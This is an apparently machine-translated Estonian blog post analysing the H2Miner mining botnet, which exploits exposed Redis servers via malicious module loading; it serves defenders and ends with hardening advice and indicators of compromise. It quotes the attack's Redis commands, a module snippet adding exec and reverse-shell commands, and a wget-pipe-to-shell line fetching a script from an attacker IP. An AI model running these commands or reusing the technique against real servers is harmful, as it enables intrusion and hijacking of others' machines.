{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/et\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"Avastatud on uus H2Miner usside puhang, mis kasutab Redis RCE-d","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>\u00dcks p\u00e4ev tagasi r\u00fcnnati \u00fche minu projekti serverit sarnase ussiga. Otsides vastust k\u00fcsimusele \"mis see t\u00e4pselt oli?\" leidsin suurep\u00e4rase artikli Alibaba Cloud Security meeskonnalt. Kuna ma ei leidnud seda artiklit Habrist, otsustasin selle spetsiaalselt teie jaoks t\u00f5lkida &lt;3\n<\/p><\/blockquote>\n<h2>Sissejuhatus<\/h2>\n<p>\nHiljuti avastas Alibaba Cloudi turvameeskond \u00e4kilise H2Miner puhangut. Selline pahavara kasutab autoriseerimise puudumist v\u00f5i n\u00f5rku paroole Redis, et p\u00e4\u00e4seda teie s\u00fcsteemidesse, s\u00fcnkroniseerides seej\u00e4rel oma pahatahtliku mooduli slave'iga master-slave s\u00fcnkroniseerimise kaudu ja l\u00f5puks laadides selle pahatahtliku mooduli r\u00fcnnatavasse masinasse ning t\u00e4ites pahatahtlikud juhised.<\/p>\n<p>Varasemalt toodi r\u00fcnnakud teie s\u00fcsteemide vastu peamiselt l\u00e4bi meetodi, mis h\u00f5lmas ajastatud \u00fclesandeid v\u00f5i SSH-v\u00f5tmeid, mis salvestati teie masinasse p\u00e4rast sissetungija sisse logimist Redis. \u00d5nneks ei ole see meetod sageli kasutatav, kuna see toob kaasa lubade kontrolli probleeme v\u00f5i erinevate s\u00fcsteemide versioonide t\u00f5ttu. Siiski v\u00f5ib see pahatahtliku mooduli laadimise meetod otseselt k\u00e4ivitada r\u00fcndaja k\u00e4sklusi v\u00f5i p\u00e4\u00e4seda juurde shellile, mis on teie s\u00fcsteemile ohtlik.<\/p>\n<p>Suure arvu <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/et\/server\/\"   title=\"serverid\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">serverid<\/a> Redis'e, mis on avatud internetis (peaaegu 1 miljon), kutsub Alibaba Cloudi turvameeskond s\u00f5bralikult kasutajaid \u00fcles mitte andma Redis'ile juurdep\u00e4\u00e4su internetist ning regulaarselt kontrollima oma paroolide usaldusv\u00e4\u00e4rsust ja ka selle suhtes, kas need on kiirelt \u00e4raarvatavad.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner on Linuxi p\u00f5histe s\u00fcsteemide kaevandamis-botnet, mis v\u00f5ib tungida teie s\u00fcsteemi erinevatel viisidel, sealhulgas autoriseerimise puudumisest Hadoop yawni, Dockerisse ja Redis'i kaugk\u00e4ivituskehtivuse (RCE) haavatavusest. Botnet t\u00f6\u00f6tab, laadides pahatahtlikke skripte ja pahavarasid teie andmete kaevandamiseks, laiendades r\u00fcnnakut horisontaalselt ning s\u00e4ilitades k\u00e4skluse ja kontrolli (C&amp;C) \u00fchenduse.<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>Redis RCE<\/h2>\n<p>\nTeadmisi selle teema kohta jagas Pavel Toporkov ZeroNights 2018-l. P\u00e4rast versiooni 4.0 toetab Redis v\u00e4liste moodulite laadimise funktsiooni, mis v\u00f5imaldab kasutajatel laadida C keeles kompileeritud so-faile, et t\u00e4ita teatud Redis k\u00e4sklusi. See funktsioon on kasulik, kuid sellel on n\u00f5rkus, mille t\u00f5ttu v\u00f5ivad failid master-slave re\u017eiimis s\u00fcnkroniseeruda slave'i kaudu fullresync re\u017eiimis. Seda saab kurjategija kasutada pahatahtlike so-failide edastamiseks. P\u00e4rast edastamise l\u00f5petamist laadivad r\u00fcndajad mooduli r\u00fcnnatavasse Redis eksemplarisse ja t\u00e4idavad mis tahes k\u00e4sku.<\/p>\n<h2>Pahatahtliku ussi anal\u00fc\u00fcs<\/h2>\n<p>\nHiljuti avastas Alibaba Cloudi turvameeskond, et H2Mineri pahatahtlike kaevandajate r\u00fchm on j\u00e4rsult suurenenud. Anal\u00fc\u00fcsi kohaselt ilmneb r\u00fcnnaku \u00fcldine protsess j\u00e4rgmiselt:<\/p>\n<p><img decoding=\"async\" alt=\"Avastatud on uus H2Miner usside puhang, mis kasutab Redis RCE-d\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner kasutab RCE Redis'i t\u00e4ielikuks r\u00fcnnakuks. Esiteks r\u00fcndavad kurjategijad kaitsmata Redis servereid v\u00f5i servereid, millel on n\u00f5rgad paroolid.<\/p>\n<p>Seej\u00e4rel kasutavad nad k\u00e4sku <code>config set dbfilename red2.so<\/code> failinime muutmiseks. P\u00e4rast seda t\u00e4idavad r\u00fcndajad k\u00e4sku <code>slaveof<\/code> master-slave replikatsiooni hosti aadressi seadmiseks. <\/p>\n<p>Kui r\u00fcnnatav Redis eksemplar loob master-slave \u00fchenduse pahatahtliku Redis'iga, mis kuulub kurjategijale, saadab r\u00fcndaja nakatatud mooduli koos fullresync k\u00e4suga failide s\u00fcnkroniseerimiseks. Seej\u00e4rel laaditakse fail red2.so r\u00fcnnatavale masinale. P\u00e4rast seda kasutavad kurjategijad moodulit .\\\/red2.so selle so-faili laadimiseks. Moodul v\u00f5ib t\u00e4ita kurjategija k\u00e4ske v\u00f5i alustada tagurdus\u00fchendust (tagauks), et saada juurdep\u00e4\u00e4su r\u00fcnnatavale masinale.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, \"system.exec\",\n        DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, \"system.rev\",\n        RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nP\u00e4rast pahatahtliku k\u00e4su t\u00e4itmist, n\u00e4iteks <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, kustutab kurjategija varukoopia faili nime ja v\u00f5tab s\u00fcsteemimooduli v\u00e4ljalaske, et kustutada j\u00e4ljed. Siiski j\u00e4\u00e4b fail red2.so endiselt r\u00fcnnatavale masinasse. Kasutajatel soovitatakse p\u00f6\u00f6rata t\u00e4helepanu kahtlaste failide olemasolule oma Redis eksemplari kaustas.<\/p>\n<p>Lisaks teatud pahatahtlike protsesside kustutamisele ressursside varastamiseks, j\u00e4rgnes r\u00fcndaja pahatahtlikule stsenaariumile, laadides \u00fcles ja k\u00e4ivitades binaarfailides pahavara, et <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. See t\u00e4hendab, et protsessi nimi v\u00f5i katalooge nimi, mis sisaldab kinsing\u2019u, v\u00f5ib viidata sellele, et see masin on selle viirusega nakatunud.<\/p>\n<p>Tagasikerimise tulemuste kohaselt t\u00e4idab pahavara peamiselt j\u00e4rgmisi funktsioone:<\/p>\n<ul>\n<li>Failide laadimine ja nende k\u00e4ivitamine<\/li>\n<li>Kaevandamine<\/li>\n<li>C&amp;C-\u00fchenduse hoidmine ja r\u00fcndaja k\u00e4skude t\u00e4itmine<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Avastatud on uus H2Miner usside puhang, mis kasutab Redis RCE-d\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nKasuta masscan'i v\u00e4liseks skaneerimiseks, et laiendada m\u00f5ju. Lisaks on C&amp;C-serveri IP-aadress programmis k\u00f5vasti kr\u00fcpteeritud ning r\u00fcnnatud host suhtleb C&amp;C-\u00fchendusega HTTP-p\u00e4ringute kaudu, kus zombis\u00fcsteemi (rikkumisega serveri) informatsioon tuvastatakse HTTP-pealkirjas.<\/p>\n<p><img decoding=\"async\" alt=\"Avastatud on uus H2Miner usside puhang, mis kasutab Redis RCE-d\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Teised r\u00fcnnakumeetodid<\/h2>\n<p>\n<img decoding=\"async\" alt=\"Avastatud on uus H2Miner usside puhang, mis kasutab Redis RCE-d\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Aadressid ja lingid, mida usaldustused kasutavad<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\nc&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>Soovitus<\/h2>\n<p>\nEsiteks ei tohiks Redis olla avatud Interneti juurdep\u00e4\u00e4suks ja peaks olema kaitstud usaldusv\u00e4\u00e4rse parooliga. Samuti on oluline, et kliendid kontrolliksid, et Redis'i kataloogist puudub fail red2.so ja et kinsing ei ole nime failis\/protsessis hostis.<br \/>\n<br \/>Allikas: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/et\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"et_EE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/et\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Uus H2Miner usaldusv\u00f5rkude puhangu avastamine, mis kasutavad Redis RCE | ProHoster","description":"\u00dcks p\u00e4ev tagasi r\u00fcnnati minu projekti \u00fchte serverit sarnase usaldustusega. Otsides vastust k\u00fcsimusele \"mis see siis oli?\" leidsin ma suurep\u00e4rase artikli Alibaba Cloud Security meeskonnalt.","canonical_url":"https:\/\/prohoster.info\/et\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"et_EE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/et\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}